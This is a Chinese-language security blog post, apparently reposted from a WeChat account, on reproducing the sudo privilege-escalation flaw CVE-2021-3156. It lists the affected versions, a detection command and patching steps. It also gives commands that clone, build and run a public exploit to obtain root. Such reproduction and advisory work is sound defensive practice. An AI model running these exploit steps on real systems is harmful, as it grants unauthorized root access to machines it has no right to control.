前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Linux sudo权限提升漏洞复现(CVE-2021-3156)

Linux sudo权限提升漏洞复现(CVE-2021-3156)

作者头像
Bypass
发布2021-02-04 14:22:15
4.4K0
发布2021-02-04 14:22:15
举报
文章被收录于专栏:BypassBypass

2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取root权限。

据报道这个漏洞已存在十年了,大部分的linux系统都存在这个sudo漏洞。站在攻击方的角度,这就是sudo提权的新姿势;站在防守方的角度,这可能是近期最需要去重视的漏洞了。


漏洞编号:CVE-2021-3156

漏洞级别:高危

受影响版本:

代码语言:javascript
复制
sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1

检测方法:

以非root用户登录系统,并运行如下命令:

代码语言:javascript
复制
sudoedit -s /

- 如果响应一个以sudoedit:开头的报错,那么表明存在漏洞。

- 如果响应一个以usage:开头的报错,那么表明补丁已经生效。

漏洞利用:

代码语言:javascript
复制
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich <target_number>

Kali Linux测试:

ubuntu-20.04.1 测试:

修复建议:

方式1、CentOS软件更新命令:

代码语言:javascript
复制
sudo yum -y update sudo

方式2、下载软件包安装,Sudo 1.9.5p2或更新版本。

sudo软件包下载地址:

代码语言:javascript
复制
https://www.sudo.ws/dist/
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-02-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Bypass 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档